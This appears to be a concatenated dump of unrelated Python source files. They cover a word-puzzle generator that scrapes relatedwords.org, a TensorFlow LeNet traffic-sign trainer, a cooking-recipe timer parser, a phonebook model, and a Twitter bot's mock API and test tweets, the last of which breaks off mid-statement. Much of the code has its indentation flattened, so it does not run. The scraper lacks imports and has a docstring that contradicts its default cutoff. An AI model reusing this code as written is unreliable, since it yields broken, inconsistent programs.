from bs4 import BeautifulSoup
import json
import re
import math
from Levenshtein import distance as levenshtein_distance
import unidecode
from nltk.stem.porter import PorterStemmer
from collections import namedtuple, OrderedDict
WordTuple = namedtuple('WordTuple', ['pretty', 'board'])
# Consider adding an additional Word wrapper to handle downstream transformations
# Might be easier to hold on on this until *after* filtering has been performed
# Then words will be immutable and can be treated as named_tuples
# Rephrase 3 univariate filters and 4 bivariate filters to fit with these new functions
# return and print the filtered words for each
def univariate_filtering(words, filter_func):
    """Identify words in the list meeting the filtering condition, and remove them.
    Minimal sketch of the planned refactor; not yet wired into filter_word_strings."""
    return [word for word in words if not filter_func(word)]

def bivariate_filtering(words, similarity_func):
    """Identify pairs of words in the list meeting the similarity condition,
    and remove the longer of the two. Minimal sketch, same caveat as above."""
    dropped = {max(a, b, key=len)
               for i, a in enumerate(words)
               for b in words[i + 1:] if similarity_func(a, b)}
    return [word for word in words if word not in dropped]
def filter_word_strings(words):
# Remove words shorter than 4 letters.
words = [word for word in words if len(word) > 3]
# Strip accents from letters
words = [unidecode.unidecode(word) for word in words]
# Remove words which contain characters other than: a-z/A-Z, spaces, hyphens.
words = [word for word in words if not re.search(r"[^a-zA-Z\-\s]", word)]
# Remove words that start with a non-alpha character (e.g. "-graphy")
words = [word for word in words if word[0].isalpha()]
# Remove words that are identical to one another.
# Hacky solution from https://stackoverflow.com/a/17016257/2562771
words = list(OrderedDict.fromkeys(words))
# Remove words that are superstrings of another existing word.
super_words = []
for word_sub in words:
for word_super in words:
if word_sub in word_super and word_sub != word_super:
super_words.append(word_super)
words = [word for word in words if word not in super_words]
print(f"\nRemoved too-similar words (superstring): {', '.join(list(super_words))}")
# Remove words of length ≥6 for which the first 70% of letters are the same
# (Cutoffs chosen manually to increase word diversity, should make more flexible.)
# ≥5/6 letters, ≥5/7 letters, ≥6/8 letters, etc
# By default pick the latter word as the one to discard
too_similar_words = set()
for i in range(len(words)):
for j in range(i+1, len(words)):
if min(len(words[i]), len(words[j])) >= 6:
prefix_len = math.ceil((0.7*min(len(words[i]), len(words[j]))))
if words[i][:prefix_len+1] == words[j][:prefix_len+1]:
too_similar_words.add(words[j])
words = [word for word in words if word not in too_similar_words]
if too_similar_words:
print(f"\nRemoved too-similar words (long-prefix): {', '.join(list(too_similar_words))}")
# If a given word is dist ≤ 1 from another, need to remove one of the two
# Should err on the side of remove the word which occurred later in the list
# Therefore build up iteration so word2_idx > word1_idx
too_similar_words = set()
for i in range(len(words)):
for j in range(i+1, len(words)):
# If the two words differ only by a single letter
# Deals with alternate spellings, e.g. "calender" vs "calendar"
# Add a min-length constraint to avoid misfiring on e.g. tide/time, suda/susa
if levenshtein_distance(words[i], words[j]) <= 1 and min(len(words[i]), len(words[j])) >= 5:
too_similar_words.add(words[j])
words = [word for word in words if word not in too_similar_words]
if too_similar_words:
print(f"\nRemoved too-similar words (Levenshtein): {', '.join(list(too_similar_words))}")
# Substrings + Levenshtein don't catch cases where both strings are short, e.g. time/timing, marked/marking
# Solution is to apply a stemmer and delete matching words
too_similar_words = set()
porter_stemmer = PorterStemmer()
for i in range(len(words)):
for j in range(i+1, len(words)):
if porter_stemmer.stem(words[i]) == porter_stemmer.stem(words[j]):
too_similar_words.add(words[j])
words = [word for word in words if word not in too_similar_words]
if too_similar_words:
print(f"\nRemoved too-similar words (stemming): {', '.join(list(too_similar_words))}")
return words
def get_related_words(word_list, score_cutoff=0.45, neighbors_cutoff=100):
"""Fetch related words from relatedwords.org, and clean them up.
    Lowered originally-chosen cutoff of 0.45 --> 0.3 because too many issues with generating puzzles."""
# Get the related words and convert it to a clean json blob.
# Form of the resulting json is:
# { 'query': <seed_word>,
# 'terms': [
# {'word': <neighbor_word>, 'score': <similarity_score>, 'from': <db_source>},
# ...
# {'word': <neighbor_word>, 'score': <similarity_score>, 'from': <db_source>}
# ]
# }
words = []
for word in word_list:
r = requests.get(f"https://relatedwords.org/relatedto/{word}")
soup = BeautifulSoup(r.content, 'html.parser')
blob = soup.find(id="preloadedDataEl")
words_json = json.loads(blob.contents[0])
# Trim down the words set as a function of score_cutoff and neighbors_cutoff.
words.append((words_json["query"].lower(),1000))
# for item in words_json["terms"]:
# print(item)
# raise
for i, term in enumerate(words_json["terms"]):
if term["score"] > score_cutoff and i < neighbors_cutoff:
words.append((term["word"],term["score"]))
else:
break
# Pause for a second so the website doesn't get suspicious
time.sleep(1.5)
# Order words by score, then toss the score info
words = list(zip(*sorted(words, key=lambda x: x[1], reverse=True)))[0]
words = filter_word_strings(words)
# Convert words to word-tuples, and operate on these going forward
word_tuples = [WordTuple(pretty=word, board=word.replace(" ", "").replace("-", "").upper()) for word in words]
# Identify words of varying length to hide in the puzzle, and remove them from the set of words being placed.
hidden_word_tuple_dict = {}
for word_tuple in word_tuples:
        # Keep short words (≤5 letters) in the primary word set
if len(word_tuple.board) > 5 and len(word_tuple.board) not in hidden_word_tuple_dict:
hidden_word_tuple_dict.update({len(word_tuple.board): word_tuple})
word_tuples = [word_tuple for word_tuple in word_tuples if word_tuple not in hidden_word_tuple_dict.values()]
return word_tuples, hidden_word_tuple_dict
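
# Hypothetical call (seed word and results illustrative):
# word_tuples, hidden = get_related_words(["railway"])
# word_tuples -> [WordTuple(pretty='train station', board='TRAINSTATION'), ...]
# hidden      -> {12: WordTuple(...), 8: WordTuple(...)}  # one hidden word
#                                                         # per board length > 5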
# ok, still ugly, but at least all the data is there
``` |
{
"source": "jonad/TrafficSignDetection",
"score": 2
} |
#### File: jonad/TrafficSignDetection/lenet_model.py
```python
import tensorflow as tf
from utils import *
from sklearn.utils import shuffle
import os
MODEL_DIR = './model/'
if not os.path.exists(MODEL_DIR):
    os.makedirs(MODEL_DIR)
class LeNetModel():
def __init__(self, logits, x_train, y_train, x_valid, y_valid, learning_rate, x, y, holdprob, hparam):
self.logits = logits
self.x_train, self.x_valid = x_train, x_valid
self.y_train, self.y_valid = y_train, y_valid
self.x = x
self.y = y
self.one_hot_y = tf.one_hot(self.y, 43)
self.learning_rate = learning_rate
self.save_path = os.path.join(MODEL_DIR, hparam)
self.hold_prob = holdprob
self.hparam = hparam
def evaluation_operation(self):
'''
Evaludation metric
:return:
'''
with tf.name_scope("accuracy"):
correct_prediction = tf.equal(tf.argmax(self.logits, 1), tf.argmax(self.one_hot_y, 1))
eval_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name='evaluation_operation')
tf.summary.scalar("accuracy", eval_operation)
return eval_operation
def loss_operation(self):
with tf.name_scope("xent_loss"):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=self.one_hot_y,
logits=self.logits)
loss_operation = tf.reduce_mean(cross_entropy)
return loss_operation
def training_operation(self):
loss_operation = self.loss_operation()
with tf.name_scope("train"):
optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)
training_operation = optimizer.minimize(loss_operation)
return training_operation
def train(self, epochs, batch_size):
training_operation = self.training_operation()
eval_op = self.evaluation_operation()
loss_op = self.loss_operation()
saver = tf.train.Saver()
init = tf.global_variables_initializer()
training_summary = tf.summary.scalar("training_accuracy", eval_op)
validation_summary = tf.summary.scalar("validation_accuracy", eval_op)
training_loss_summary = tf.summary.scalar("training_loss", loss_op)
validation_loss_summary = tf.summary.scalar("validation_loss", loss_op)
#summ = tf.summary.merge_all()
best_validation_accuracy = 0
best_training_accuracy = 0
with tf.Session() as sess:
sess.run(init)
num_examples = len(self.x_train)
writer_val = tf.summary.FileWriter(MODEL_DIR + self.hparam + 'val', sess.graph)
writer_train = tf.summary.FileWriter(MODEL_DIR + self.hparam + 'train', sess.graph)
writer_train.add_graph(sess.graph)
writer_val.add_graph(sess.graph)
for i in range(epochs):
self.x_train, self.y_train = shuffle(self.x_train, self.y_train)
for offset in range(0, num_examples, batch_size):
end = offset + batch_size
batch_x, batch_y = self.x_train[offset:end], self.y_train[offset:end]
sess.run(training_operation, feed_dict={self.x: batch_x, self.y: batch_y, self.hold_prob: 0.5})
training_accuracy, train_summary = sess.run([eval_op, training_summary], feed_dict={self.x: self.x_train[0:1000], self.y: self.y_train[0:1000], self.hold_prob:1.0})
validation_accuracy, validation_summ = sess.run([eval_op, validation_summary], feed_dict={self.x: self.x_valid, self.y: self.y_valid, self.hold_prob:1.0})
train_loss, train_loss_summ = sess.run([loss_op, training_loss_summary], feed_dict={self.x: self.x_train[0:1000], self.y: self.y_train[0:1000], self.hold_prob:0.5})
validation_loss, validation_loss_summ = sess.run([loss_op, validation_loss_summary], feed_dict={self.x: self.x_valid, self.y: self.y_valid, self.hold_prob:0.5})
writer_train.add_summary(train_summary, i)
writer_train.add_summary(train_loss_summ, i)
writer_train.flush()
writer_val.add_summary(validation_summ, i)
writer_val.add_summary(validation_loss_summ, i)
writer_val.flush()
if (validation_accuracy > best_validation_accuracy):
                    improvement_msg = 'Improved from {} to {}'.format(best_validation_accuracy, validation_accuracy)
best_validation_accuracy = validation_accuracy
print(best_validation_accuracy)
# Save all variables of the TensorFlow graph to file.
saver.save(sess=sess, save_path=self.save_path)
print('EPOCH {} ...'.format(i+1))
print("Training Accuracy = {:.3f}".format(training_accuracy))
print("Validation Accuracy = {:.3f}".format(validation_accuracy))
                    print(improvement_msg)
print()
else:
print('EPOCH {} ...'.format(i + 1))
print("Training Accuracy = {:.3f}".format(training_accuracy))
print("Validation Accuracy = {:.3f}".format(validation_accuracy))
print('did not improve')
print()
print(best_validation_accuracy)
def predict(self, y):
return tf.equal(tf.argmax(self.logits, 1), tf.argmax(y, 1))
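
# Sketch of intended use (the placeholder tensors and hparam string below are
# assumptions, not defined in this file):
# model = LeNetModel(logits, x_train, y_train, x_valid, y_valid,
#                    learning_rate=1e-3, x=x_ph, y=y_ph, holdprob=keep_prob,
#                    hparam='lr1e-3_drop05')
# model.train(epochs=30, batch_size=128)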
``` |
{
"source": "JonaEnz/CookLangPy",
"score": 3
} |
#### File: CookLangPy/CookLangPy/timer.py
```python
import re
from typing import List
from CookLangPy.unitconversion import largestUnitGreaterOne, unitConversion
timerReg = re.compile(r"~(.*){(\d+(?:\.\d+)?)%(hour|minute|second)s?}")
class Timer():
"""
A timer is a string of the form "~name{length%unit}".
length: the length of the timer in seconds.
name: the name of the timer (Optional).
"""
def __init__(self) -> None:
"""
Initialize the timer.
"""
self.length : int = 0
self.name : str = ""
def parse(input:str) -> List['Timer']:
timers = []
for match in timerReg.findall(input):
t = Timer()
t.length = unitConversion(match[2], "SECOND", float(match[1]))
t.name = match[0]
timers.append(t)
return timers
def __str__(self) -> str:
unit = largestUnitGreaterOne(["SECOND","MINUTE", "HOUR"], "SECOND", float(self.length))
val = unitConversion("SECOND", unit, float(self.length))
if val > 1.0:
unit += "S"
return "(Timer {0}: {1} {2}".format(self.name, val, unit.lower())
def fileOut(self) -> str:
unit = largestUnitGreaterOne(["SECOND","MINUTE", "HOUR"], "SECOND", float(self.length))
val = unitConversion("SECOND", unit, float(self.length))
if val > 1.0:
unit += "S"
return r"~" + self.name + r"{" + str(int(val)) + r"%" + unit.lower() + r"}"
``` |
{
"source": "jonaeroy/Hobby",
"score": 3
} |
#### File: app/models/phonebook.py
```python
from ferris.core.ndb import BasicModel
from ferris.behaviors.searchable import Searchable
from google.appengine.ext import ndb
class Phonebook(BasicModel):
Name = ndb.StringProperty(required=True)
Number = ndb.StringProperty(required=True)
class Meta:
behaviors = (Searchable,)
@classmethod
def create(cls, params):
item = cls()
item.populate(**params)
item.put()
return item
@classmethod
def list(cls):
return cls.query()
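
    # Hypothetical usage from a controller (values illustrative):
    # Phonebook.create({'Name': 'Ada Lovelace', 'Number': '555-0100'})
    # entries = Phonebook.list()  # an ndb query over all entries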
```
#### File: angular/controllers/angular.py
```python
from ferris import Controller, route_with
class Angular(Controller):
@route_with(template='/ng-view/<name:.*>')
def show(self, name):
self.meta.view.template_name = 'angular/' + name
``` |
{
"source": "jonaes/ds100bot",
"score": 2
} |
#### File: ds100bot/Mock/Api.py
```python
import tweepy # for exceptions
from Externals import Twitter
from Externals.Measure import Measure
from AnswerMachine.tweet import Tweet
import Persistence.log as log
from .Tweet import User, mocked_source, mocked_tweets
log_ = log.getLogger(__name__)
class Count: # pylint: disable=too-few-public-methods
def __init__(self):
self.correct = 0
self.missed = 0
self.bad_content = 0
class Result: # pylint: disable=too-few-public-methods
def __init__(self):
self.tweet = Count()
self.follow = Count()
class MockApi(Twitter): # pylint: disable=too-many-instance-attributes
def __init__(self, **kwargs):
log_.setLevel(log_.getEffectiveLevel() - 10)
self.running_id = 10001
self.myself = User.theBot
self.mode = kwargs.get('mode', 'testcases')
mocked_t = mocked_tweets()
if self.mode == 'external':
self.mock = mocked_source()
elif self.mode == 'testcases':
self.mock = mocked_t
elif self.mode == 'id':
self.mock = [t for t in mocked_t if t.id in kwargs.get('id_list', [])]
else:
raise ValueError("Invalid mode in {}: {}".format(__name__, self.mode))
self.replies = {}
self.double_replies = []
self.measure = Measure()
self.readonly = True
def get_tweet(self, tweet_id):
for t in self.mock:
if t.id == tweet_id:
return t
raise tweepy.TweepError("Kein solcher Tweet vorhanden")
def tweet_single(self, text, **kwargs):
super().tweet_single(text, **kwargs)
if 'in_reply_to_status_id' in kwargs:
reply_id = kwargs['in_reply_to_status_id']
# don't track thread answers:
if reply_id != self.running_id:
if reply_id in self.replies:
log_.warning("Tweet %d was replied to twice!", reply_id)
self.double_replies.append(reply_id)
else:
self.replies[reply_id] = text.strip()
self.running_id += 1
return self.running_id
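
    # Note: running_id stands in for Twitter's server-assigned status ids;
    # replies within the bot's own thread (reply_id == self.running_id) are
    # deliberately not tracked, so multi-tweet answers aren't flagged as
    # double replies.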
def mentions(self, highest_id):
mention_list = []
for t in self.mock:
for um in t.raw['entities']['user_mentions']:
if um['screen_name'] == self.myself.screen_name:
mention_list.append(t)
break
return mention_list
def timeline(self, highest_id):
return [t for t in self.mock if t.author.follows]
def hashtag(self, tag, highest_id):
return [t for t in self.mock if Tweet(t).has_hashtag(tag)]
def is_followed(self, user):
return user.follows
def follow(self, user):
super().follow(user)
user.follows = True
def defollow(self, user):
super().defollow(user)
user.follows = False
def statistics(self, output='descriptive'):
stat_log = log.getLogger('statistics', '{message}')
res_count = Result()
stat_log.debug(" RESULTS")
for t in self.mock:
was_replied_to = t.id in self.replies
if t.expected_answer is None:
if was_replied_to:
stat_log.error("Tweet %d falsely answered", t.id)
res_count.tweet.missed += 1
else:
res_count.tweet.correct += 1
stat_log.info("Tweet %d correctly unanswered", t.id)
continue
# expected answer is not None:
if not was_replied_to:
res_count.tweet.missed += 1
stat_log.error("Tweet %d falsely unanswered", t.id)
continue
# correctly answered: is it the correct answer?
if t.expected_answer == self.replies[t.id]:
res_count.tweet.correct += 1
stat_log.info("Tweet %d correctly answered with correct answer", t.id)
continue
res_count.tweet.bad_content += 1
stat_log.error("Tweet %d correctly answered, but with wrong answer", t.id)
stat_log.warning(t.expected_answer)
stat_log.warning("↑↑↑↑EXPECTED↑↑↑↑ ↓↓↓↓GOT THIS↓↓↓↓")
stat_log.warning(self.replies[t.id])
for l in User.followers, User.nonfollowers:
for u in l:
if u.follows == u.follow_after:
stat_log.info("User @%s has correct following behaviour %s",
u.screen_name, u.follows)
res_count.follow.correct += 1
else:
stat_log.error("User @%s doesn't follow correctly (should %s, does %s)",
u.screen_name, u.follow_after, u.follows)
res_count.follow.missed += 1
        self.report_statistics(stat_log, output, res_count)
return res_count.tweet.missed + res_count.tweet.bad_content + res_count.follow.missed
    def report_statistics(self, stat_log, output, res_count): # pylint: disable=R0201
denominator = (res_count.tweet.correct + res_count.tweet.missed +
res_count.tweet.bad_content + res_count.follow.correct +
res_count.follow.missed)
if denominator == 0:
stat_log.log(51, "No testcases found")
elif output == 'descriptive':
stat_log.log(51, "ALL GOOD: %2d", res_count.tweet.correct)
stat_log.log(51, "INCORRECT TEXT: %2d", res_count.tweet.bad_content)
stat_log.log(51, "WRONG ANSWER/NOT ANSWER:%2d", res_count.tweet.missed)
stat_log.log(51, "CORRECT FOLLOWING: %2d", res_count.follow.correct)
stat_log.log(51, "WRONG FOLLOWING: %2d", res_count.follow.missed)
elif output == 'summary':
ratio = (res_count.tweet.correct + res_count.follow.correct) / (0.0 + denominator)
stat_log.log(51, "A %d/%d F %d/%d R %.1f%%",
res_count.tweet.correct,
res_count.tweet.bad_content + res_count.tweet.missed,
res_count.follow.correct, res_count.follow.missed,
100.0 * ratio)
```
#### File: ds100bot/Mock/Tweet.py
```python
import copy
import re
import Persistence.log as log
log_ = log.getLogger(__name__)
class User:
# pylint: disable=R0903
def __init__(self, **kwargs):
self.screen_name = kwargs['screen_name']
self.id = kwargs['id']
self._mention = {
'screen_name': self.screen_name,
'name': kwargs['name'],
'id': self.id,
'indices': [0, 0]
}
self.follows = kwargs.get('follows', False)
self.follow_after = self.follows
def mention(self, start):
result = copy.deepcopy(self._mention)
result['indices'][0] = start
result['indices'][1] = start + len(self.screen_name)
return result
User.theBot = User(
id=1065715403622617089,
id_str='1065715403622617089',
name='DS100-Bot',
screen_name='_ds_100',
location='',
description='''Expandiert DS100-Abkürzungen. #DS100 und #$KURZ verwenden, oder den Bot
taggen. #folgenbitte und der Bot findet #$KURZ ohne Aufforderung. Siehe Webseite.''',
url='https://t.co/s7A9JO049r',
entities={
'url': {
'urls': [{
'url': 'https://t.co/s7A9JO049r',
'expanded_url': 'https://ds100.frankfurtium.de/',
'display_url': 'ds100.frankfurtium.de',
'indices': [0, 23]
}]
},
'description': {'urls': []}
},
protected=False,
followers_count=61,
friends_count=29,
listed_count=0,
favourites_count=0,
utc_offset=None,
time_zone=None,
geo_enabled=False,
verified=False,
statuses_count=250,
lang=None,
contributors_enabled=False,
is_translator=False,
is_translation_enabled=False,
profile_background_color='F5F8FA',
profile_background_image_url=None,
profile_background_image_url_https=None,
profile_background_tile=False,
profile_image_url=
'http://pbs.twimg.com/profile_images/1140888262619385856/dODzmIW9_normal.png',
profile_image_url_https=
'https://pbs.twimg.com/profile_images/1140888262619385856/dODzmIW9_normal.png',
profile_link_color='1DA1F2',
profile_sidebar_border_color='C0DEED',
profile_sidebar_fill_color='DDEEF6',
profile_text_color='333333',
profile_use_background_image=True,
has_extended_profile=False,
default_profile=True,
default_profile_image=False,
following=False,
follow_request_sent=False,
notifications=False,
translator_type='none',
follows=True)
User.followed = User(id=11, id_str='11',
name='Followee account',
screen_name='followee',
description='Fake: This user is followed by the bot.',
follows=True)
User.notfollowed = User(id=12, id_str='12',
name='Some other Account',
screen_name='someotheraccount',
description='Fake: This user is not followed by the bot.',
follows=False)
User.followers = []
for i in range(21, 26):
User.followers.append(User(id=i, name='Follower', screen_name='follower{}'.format(i),
follows=True))
User.nonfollowers = []
for i in range(31, 37):
User.nonfollowers.append(User(id=i, name='Nonfollower', screen_name='otherone{}'.format(i),
follows=False))
class TweepyMock:
# pylint: disable=R0902
def __init__(self, **kwargs):
self.raw = kwargs
self.add_to_raw('expected_answer', None)
self.add_to_raw('display_text_range', [0, len(self.raw['full_text'])])
self.add_to_raw('in_reply_to_status_id', None)
self.add_to_raw('in_reply_to_user_id', None)
self.add_to_raw('in_reply_to_screen_name', None)
self.id = self.raw['id']
self.full_text = self.raw['full_text']
self.create_entities()
self.author = self.raw['user']
self.display_text_range = self.raw['display_text_range']
if 'quoted_status_id' in self.raw:
self.quoted_status_id = self.raw['quoted_status_id']
else:
self.quoted_status_id = None
self.in_reply_to_status_id = self.raw['in_reply_to_status_id']
self.expected_answer = self.raw.get('expected_answer', None)
self.retweeted_status = self.raw.get('retweeted_status', False)
if 'extended_entities' in self.raw:
self.extended_entities = self.raw['extended_entities']
def add_to_raw(self, key, val):
if key not in self.raw:
self.raw[key] = val
def create_entities(self):
self.add_to_raw('entities', {})
if 'hashtags' not in self.raw['entities']:
# create your own hashtag list
ht = re.compile(r"""\#(\w+)""")
self.raw['entities']['hashtags'] = []
for t in ht.finditer(self.full_text):
self.raw['entities']['hashtags'].append({
'text': t.group(1),
'indices': [t.start(1), t.end(1)]
})
if 'user_mentions' not in self.raw['entities']:
self.raw['entities']['user_mentions'] = []
self.entities = self.raw['entities']
def __str__(self):
lines = self.full_text.splitlines()
length = max([len(l) for l in lines])
length = max(length, len(self.author.screen_name) + 2)
result = "┏{}┓\n".format('━'*(length+2))
result += ("┃ @{{:{}}} ┃\n".format(length - 1)).format(self.author.screen_name + ":")
for l in lines:
result += ("┃ {{:{}}} ┃\n".format(length)).format(l)
result += "┗{}┛".format('━'*(length+2))
return result
def mocked_tweets():
# pylint: disable=C0301, R0915
# signatures bot*:
# tl/nl: in timeline / not in timeline
# ab/ns/xs/na: abbreviation present (#FF, $123) / no sigil (FF) / explicit source (#DS:FF) / no abbreviation present
# xm/im: explicit mention / implicit mention (@ outside display_text_range)
# mt/md/me: magic tag / default magic tag / else magic tag
# pr/rt/re: pure retweet / retweet=quote / reply
# fs/fe #folgenbitte / #entfolgen
list_of_tweets = []
list_of_tweets.append(TweepyMock(
full_text='This tweet should never been seen nor processed by the Bot. bot%nl%na%101',
expected_answer=None,
id=101,
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet should appear in the Bot’s timeline, but should be ignored. bot%tl%na%102',
id=102,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet explicitly mentions @_ds_100, but no other tweet. bot%tl%xm%na%103',
id=103,
entities={'user_mentions': [User.theBot.mention(31)]},
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet explicitly mentions @_ds_100, but no other tweet. bot%nl%xm%na%104',
id=104,
entities={'user_mentions': [User.theBot.mention(31)]},
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet includes magic hashtag #DS100, but no other tweet. bot%tl%md%na%105',
id=105,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet includes magic hashtag #DB640, but no other tweet. bot%nl%mt%na%106',
id=106,
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet is ignored because of #NOBOT #FF bot%tl%me%301',
id=107,
user=User.followed,
))
list_of_tweets.append(TweepyMock(
full_text='This tweet my own #FF bot%...%108',
id=108,
user=User.theBot
))
list_of_tweets.append(TweepyMock(
full_text='This tweet pure retweet #FF bot%tl%ab%pr%109',
id=109,
retweeted_status=True,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='#entfolgen bot%tl%fe%151',
id=151,
user=User.followers[0]
))
list_of_tweets.append(TweepyMock(
full_text='#entfolgen bot%nl%fe%152',
id=152,
user=User.followers[1]
))
list_of_tweets.append(TweepyMock(
full_text='#entfolgen @_ds_100 bot%xm%fe%153',
id=153,
entities={'user_mentions': [User.theBot.mention(12)]},
user=User.followers[2]
))
User.followers[2].follow_after = False
list_of_tweets.append(TweepyMock(
full_text='@_ds_100 #entfolgen bot%im%fe%154',
id=154,
display_text_range=[10, 52],
entities={'user_mentions': [User.theBot.mention(0)]},
user=User.followers[3]
))
list_of_tweets.append(TweepyMock(
full_text='#DS100 #entfolgen bot%mt%fe%155',
id=155,
user=User.followers[4]
))
list_of_tweets.append(TweepyMock(
full_text='#folgenbitte bot%tl%fs%161',
id=161,
user=User.nonfollowers[0]
))
list_of_tweets.append(TweepyMock(
full_text='#folgenbitte bot%nl%fs%162',
id=162,
user=User.nonfollowers[1]
))
list_of_tweets.append(TweepyMock(
full_text='#folgenbitte @_ds_100 bot%xm%fs%163',
id=163,
entities={'user_mentions': [User.theBot.mention(12)]},
user=User.nonfollowers[2]
))
User.nonfollowers[2].follow_after = True
list_of_tweets.append(TweepyMock(
full_text='@_ds_100 #folgenbitte bot%im%fs%164',
id=164,
display_text_range=[10, 62],
entities={'user_mentions': [User.theBot.mention(0)]},
user=User.nonfollowers[3]
))
list_of_tweets.append(TweepyMock(
full_text='#DS100 #folgenbitte bot%mt%fs%165',
id=165,
entities={'user_mentions': []},
user=User.nonfollowers[4]
))
list_of_tweets.append(TweepyMock(
full_text='@_ds_100 This tweet xm @_ds_100 in a reply #folgenbitte bot%nl%xm%im%fs%issue[9]%204',
display_text_range=[9, 75],
id=166,
entities={'user_mentions': [
User.theBot.mention(0),
User.theBot.mention(23)
]},
user=User.nonfollowers[5]
))
User.nonfollowers[5].follow_after = True
list_of_tweets.append(TweepyMock(
full_text='This tweet is quoted with explicit mention. bot%ns%nl%201 FF FK FM FW',
expected_answer='FF: Frankfurt (Main) Hbf\nFK: Kassel Hbf\nFW: Wiesbaden Hbf',
id=201,
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet explicitly mentions @_ds_100 and quotes tweet bot%xm%rt[201]%221: https://t.co/f4k3url_12',
expected_answer=None,
id=221,
entities={'user_mentions': [User.theBot.mention(31)]},
user=User.notfollowed,
quoted_status_id=201
))
list_of_tweets.append(TweepyMock(
full_text='This tweet is replied-to with explicit mention. bot%nl%ns%202 FF FK FM FW',
expected_answer='FF: Frankfurt (Main) Hbf\nFK: Kassel Hbf\nFW: Wiesbaden Hbf',
id=202,
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='@followee @_ds_100 This tweet: bot%xm%re[202]%222',
id=222,
entities={'user_mentions': [User.notfollowed.mention(0), User.theBot.mention(11)]},
in_reply_to_status_id=202,
in_reply_to_user_id=User.notfollowed.id,
in_reply_to_screen_name=User.notfollowed.screen_name,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet is replied to with magic hashtag _FFM. bot%nl%ns%203 #FW',
expected_answer='FFM#FW: <NAME>',
id=203,
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet replies with magic hashtag #_FFM. bot%nl%me%re[203]%223',
id=223,
user=User.notfollowed,
in_reply_to_status_id=203,
in_reply_to_user_id=User.notfollowed.id,
in_reply_to_screen_name=User.notfollowed.screen_name
))
list_of_tweets.append(TweepyMock(
full_text='This tweet my own will be quoted #FF bot%tl%ab%204',
id=204,
user=User.theBot
))
list_of_tweets.append(TweepyMock(
full_text='This tweet quotes myself, @_ds_100! bot%tl%ab%pr%re[204]%224',
id=224,
entities={'user_mentions': [User.theBot.mention(26)]},
user=User.followed,
in_reply_to_status_id=204,
in_reply_to_screen_name=User.theBot.screen_name
))
list_of_tweets.append(TweepyMock(
full_text='Hallo @_ds_100, do you know $1733? bot%tl%xm%ab[1,$]%issue[8]%301',
expected_answer='1733: Hannover --Kassel-- - Würzburg',
id=301,
entities={'user_mentions': [User.theBot.mention(6)]},
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet plain tags #FF #_FH #DS:FFU #DS:_FKW #DS:HG_ bot%tl%ab%ns%401',
expected_answer='FF: Frankfurt (Main) Hbf\nFFU: Fulda\nHG: Göttingen',
id=401,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet different cases #DS:FF #DS:Fkw #ÖBB:Aa #ÖBB:AB bot%tl%xs%402',
expected_answer='FF: Frankfurt (Main) Hbf\nÖBB#Aa: W․Mat․-Altmannsdorf (in Wbf)',
id=402,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet blacklist #DBL #DS:WLAN bot%tl%bl%403',
expected_answer='WLAN: Langen',
id=403,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet mixes sources #MS #_FFM #WBC #_NO #OSL #DS:FF #BRG #DS100 #FKW bot%tl%ab%xs%is%mt%me%404',
expected_answer='FFM#MS: Festhalle/Messe\nFFM#WBC: Willy-Brandt-Platz (C-Ebene)\nNO#OSL: Oslo S\nFF: Frankfurt (Main) Hbf\nNO#BRG: Bergen\nFKW: Kassel-Wilhelmshöhe',
id=404,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet do not find CH = Chur #_CH #BS bot%tl%ab%mt%issue[13]%411',
expected_answer='CH#BS: Basel SBB',
id=411,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet make sure 411 works: #CH:CH bot%tl%xs%issue[13]%412',
expected_answer='CH#CH: Chur',
id=412,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅰ: #NO:249 #NO:ÅBY bot%tl%xs%unusual%420',
expected_answer='NO#249: H-sign 249\nNO#ÅBY: Åneby',
id=420,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅱ: $DS:VDE8¹ #CH:600133 #CH:ALT94 bot%tl%xs%unusual%421',
expected_answer='VDE8¹: Nürnberg-Erfurt\nCH#600133: UNO Linie 600, km 133.179\nCH#ALT94: Altstätten SG 94',
id=421,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅲ: #AT:Aa_G #AT:Aa_Z9 #AT:Z bot%tl%xs%unusual%422',
expected_answer='AT#Aa G: Grenze ÖBB-WLB im km 7,610\nAT#Aa Z9: Wr․ Neudorf\nAT#Z: Zell am See',
id=422,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅳ: #DS:AA_G #DS:AAG #DS:EM302 bot%tl%xs%unusual%423',
expected_answer='AA G: Hamburg-Altona Gbf\nAAG: Ascheberg (Holst)\nEM302: Oberhausen Sbk M302',
id=423,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅴ: #BOT:SARS_COV_2 #BOT:REKURSION #BOT:toggle bot%tl%xs%unusual%424',
expected_answer='SARS COV 2: Dieser Bot ist offiziell Virusfrei™ und immun. Kuscheln, Händchenhalten etc. ist erlaubt. Bitte nicht anniesen (weil ist eklig). Lasst euch impfen, sobald ihr die Gelegenheit bekommt!\nREKURSION: Siehe bitte #REKURSION',
id=424,
user=User.followed
))
list_of_tweets.append(TweepyMock(
